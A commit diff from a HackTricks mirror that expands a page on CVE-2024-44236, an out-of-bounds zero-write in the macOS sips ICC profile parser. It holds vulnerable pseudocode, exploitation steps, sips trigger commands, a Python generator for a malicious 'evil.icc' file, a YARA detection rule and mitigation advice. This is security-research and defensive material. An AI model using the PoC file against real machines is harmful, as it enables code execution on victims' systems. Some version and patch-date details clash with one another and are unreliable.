maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/binary-exploitation/arbitrary-...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-30 01:43:48 +00:00
parent 18b2e7f2c0
commit cc177db336
1 changed files with 74 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

100
src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md
View File

@ -4,52 +4,100 @@
## Overview
An out-of-bounds write vulnerability in Apple macOS Scriptable Image Processing System (`sips`) ICC profile parser (macOS 15.0.1, sips-307) due to improper validation of the `offsetToCLUT` field in `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. A crafted ICC file can trigger zero-writes up to 16 bytes past the heap buffer, corrupting heap metadata or function pointers and enabling arbitrary code execution (CVE-2024-44236).
An out-of-bounds **zero-write** vulnerability in Apple macOS **Scriptable Image Processing System** (`sips`) ICC profile parser (macOS 15.0.1, `sips-307`) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tags. If attackers set `offsetToCLUT == tagDataSize`, the parser erases **16 bytes past the end of the heap buffer**. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).
> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.
## Vulnerable Code
The vulnerable function reads and zeroes 16 bytes starting from an attacker-controlled offset without ensuring it lies within the allocated buffer:
```c
// Pseudocode from sub_1000194D0 in sips-307 (macOS 15.0.1)
for (i = offsetToCLUT; i < offsetToCLUT + 16; i++) {
if (i > numberOfInputChannels && buffer[i] != 0)
buffer[i] = 0;
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
// BAD ➜ zero 16 bytes starting *at* offsetToCLUT
for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
buffer[i] = 0; // no bounds check vs allocated size!
}
```
Only a check `offsetToCLUT <= totalDataLength` is performed. By setting `offsetToCLUT == tagDataSize`, the loop indexes up to 16 bytes past the end of `buffer`, corrupting adjacent heap metadata.
## Exploitation Steps
1. **Craft malicious `.icc` profile:**
- Build the ICC header (128 bytes) with signature `acsp` and a single `lutAToBType` or `lutBToAType` tag entry.
- In the tag table, set `offsetToCLUT` equal to the tag's `size` (`tagDataSize`).
- Place attacker-controlled data immediately after the tag data block to overwrite heap metadata.
2. **Trigger parsing:**
1. **Craft a malicious `.icc` profile**
* Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.
* Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`).
* Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
2. **Trigger parsing with any sips operation that touches the profile**
```bash
sips --verifyColor malicious.icc
# verification path (no output file needed)
sips --verifyColor evil.icc
# or implicitly when converting images that embed the profile
sips -s format png payload.jpg --out out.png
```
3. **Heap metadata corruption:** The OOB zero-writes overwrite allocator metadata or adjacent pointers, allowing the attacker to hijack control flow and achieve arbitrary code execution in the context of the `sips` process.
3. **Heap metadata corruption ➜ arbitrary write ➜ ROP**
On Apples default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profiles tag at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, letting the attacker **allocate a fake object at an arbitrary address** and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.
### Quick PoC generator (Python 3)
```python
#!/usr/bin/env python3
import struct, sys
HDR = b'acsp'.ljust(128, b'\0') # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)] # one tag directly after header
profile = HDR
profile += struct.pack('>I', len(TAGS)) # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)
mab = bytearray(52) # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52) # offsetToCLUT = size (OOB start)
profile += mab
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```
### YARA detection rule
```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
meta:
description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
author = "HackTricks"
strings:
$magic = { 61 63 73 70 } // 'acsp'
$mab = { 6D 41 42 20 } // 'mAB '
$mba = { 6D 42 41 20 } // 'mBA '
condition:
$magic at 0 and
for any i in (0 .. 10): // up to 10 tags
(
($mab at 132 + 12*i or $mba at 132 + 12*i) and
uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
)
}
```
## Impact
Successful exploitation results in remote arbitrary code execution at user privilege on macOS systems running the vulnerable `sips` utility.
Opening or processing a crafted ICC profile leads to remote **arbitrary code execution** in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).
## Detection
## Detection & Mitigation
- Monitor file transfers on common protocols (FTP, HTTP/S, IMAP, SMB, NFS, SMTP).
- Inspect transferred files with signature `acsp`.
- For each `mAB ` or `mBA ` tag, verify if the `Offset to CLUT` field equals the `Tag data size`.
- Flag as suspicious if this condition is met.
* **Patch!** Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
* Deploy the YARA rule above on email gateways and EDR solutions.
* Strip or sanitise embedded ICC profiles with `exiftool -icc_profile= -overwrite_original <file>` before further processing on untrusted files.
* Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.
* For DFIR, look for recent execution of `sips --verifyColor` or `ColorSync` library loads by sandboxed apps in the unified log.
## References
- ZDI blog: CVE-2024-44236: Remote Code Execution Vulnerability in Apple macOS sips Utility
https://www.thezdi.com/blog/2025/5/7/cve-2024-44236-remote-code-execution-vulnerability-in-apple-macos
- Apple October 2024 Security Update (patch shipping CVE-2024-44236)
https://support.apple.com/en-us/121564
* Trend Micro Zero Day Initiative advisory ZDI-24-1445 “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
* Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”
https://support.apple.com/en-us/HT213981
{{#include ../../banners/hacktricks-training.md}}